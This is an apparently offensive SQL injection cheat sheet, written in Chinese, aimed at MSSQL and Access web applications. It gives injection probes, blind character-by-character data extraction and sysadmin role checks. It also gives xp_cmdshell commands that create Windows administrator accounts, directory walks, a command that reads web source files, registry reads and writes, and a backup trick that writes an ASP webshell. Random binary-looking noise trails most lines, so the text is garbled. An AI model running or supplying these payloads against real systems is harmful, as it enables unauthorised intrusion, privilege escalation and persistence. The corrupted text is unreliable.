1.判断是否有注入;and 1=1 ;and 1=2 �%�`1CE\f
2.初步判断是否是mssql ;and user>0 E�vQwGt1)P
#x@�lZ!��Y
3.注入参数是字符'and [查询条件] and ''=' etMh=/�NFV
�2qM�sa>~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Z�WR�Rh^��
bH�&)r�n��
5.判断数据库系统 bTQa��'y`3
g+� �1=�5g
;and (select count(*) from sysobjects)>0 mssql /:�{_|�P�\
~uR6z//%��
;and (select count(*) from msysobjects)>0 access n�,a�5LR��
Evq�Ai/(�g
�)���Q�CM2
&��_/%2qs
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �"=�\_++��
6mpg�&��'>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 oX�lxPN3�9
_�c
]3nzIr
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 66@3$P%1p�
s7n�X\:Bw:
9.(1)猜字段的ascii值(access) 9�me}&Fd�r
1~5q���:X�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �H4'DL'8�3
''OInfd�?�
(2)猜字段的ascii值(mssql) wYO�"��znd
b}Hl$V�(uD
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 1m<?Q&|m$
�yC 7Vb
P�
10.测试权限结构(mssql) QK!:���q{�
lA�n+�gDP�
Q�|=�
Q]$d
�DxKfWb5 R
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �=�PFR{=�F
nOa�l7BN�N
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- xJ�2O�4ob
�,�)r��ZAI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ez�r\����T
5�u|=;Hz*)
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �u@Cf*VPK�
2@R8P�~^W�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- fQ�W_Y�Qsb
I�F�rb}�yH
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��G�tM(
Y�
7}'A)C�>J;
;and 1=(select IS_MEMBER('db_owner'));-- �o�d}E�M_
vf'�cx�:m�
O�V�Us]uK�
X�m8Z�+�}i
11.添加mssql和系统的帐户 I51oG:6fR?
����@bW[J
;exec master.dbo.sp_addlogin username;-- v��-;X�yVx
;exec master.dbo.sp_password null,username,password;-- \%Ah^�U)gS
=qp�}p'BYe
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lQdnL.w$.4
6�/mkJj+"�
;exec master.dbo.xp_cmdshell 'net user username password |ON&._�`LH
-4?xwz9o$7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��G��=C5T(
�^0��Q=�#p
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Q�\�2�7�\2
C^/� -��lc
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- lbB.�*oQ��
Rct"\{V')n
T�1(j �l�)
&8]#�RQy{f
12.(1)遍历目录 �UEEBWz�H
7��bonOt
Y
;create table dirs(paths varchar(100), id int) ~[��zFQ)([
�"B9[�cDM&
;insert dirs exec master.dbo.xp_dirtree 'c:\' �&N"'7bK6n
��jB%"AvIX
;and (select top 1 paths from dirs)>0 $AA~]'O>6:
my�\o P(e\
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �:�T7?���
H��~[LJ�5x
�-��}Cc"qm
3tT|9T�b�@
(2)遍历目录 1KTa�bj/�C
a�FRTNu/r
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 9Qzjqq:"Li
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y Y>-MoF/t
�1
[S�v���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 YVB�%
kKv{
(�px*R��~}
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Sc&)~h}�YF
1�z~k1usRK
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 /7k�.r}6\R
�zBk_�-�'z
�.vv��5��t
FOCoiocPi�
13.mssql中的存储过程 ���p!+���L
"_K}r�I6(t
xp_regenumvalues 注册表根键, 子键 m<FF$pT�T
${hy���Nt�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 R9�tckR�G#
|H ^w>�m�k
xp_regread 根键,子键,键值名 !}>�eo2$r^
F2IC$:�e
M
;exec xp_regread 8�yE�!7$Mj
l�60ikc4$I
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �g!1I21M1~
\f��(Y:}9�
xp_regwrite 根键,子键, 值名, 值类型, 值 G*i.�a*9<)
�?S�C�3Vzr
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �uu}a:qrY
1�P_F�e[8�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ���5ZnSA9?
Y 3o�^Euou
xp_regdeletevalue 根键,子键,值名 +w� "�XN�l
=m�`l%�V[�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 E�fK�M*�;A
�<fNG��hmL
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 89z�uL18�V
OuB�2 x=B�
h� �ZoC _\
g-."sniP$g
14.mssql的backup创建webshell p1Q/g�� Il
MWM
+hk1fs
use model �|]^l^e�6m
R�=`U�4Ml;
create table cmd(str image); ��[�ZuVUOm
AK6=��Ydu�
insert into cmd(str) values (''); Q>�ki�Vvc�
s�aa�tU�;V
backup database model to disk='c:\l.asp'; K<c2P�Fo)Q
y:�Z$LmPc<
z{��%oJ�_�
y� k?SD1hj
15.mssql内置函数 j7f5|^/x�3
Ll,I-BQ�9
;and (select @@version)>0 获得Windows的版本号 m������HKJ
t-_#Q bzE{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa f�,�|QAj=a
>f>��V5L%1
;and (select user_name())>0 爆当前系统的连接用户 St�E�Q�
-k
!�?j�K1{E3
;and (select db_name())>0 得到当前连接的数据库 +<�&E�3O�r
nt7|f,_��J
;:P7}v fz!
>GgE,���h�
16.简洁的webshell bn���$)f6%
,�ohmc�\*J
use model 9�+}cE**=d
ri:�,��q/-
create table cmd(str image); �'}�_=kp'X
)�&>�L !,z
insert into cmd(str) values (''); � q$F)��!&
�L��/�~D<V
backup database model to disk='g:\wwwtest\l.asp';
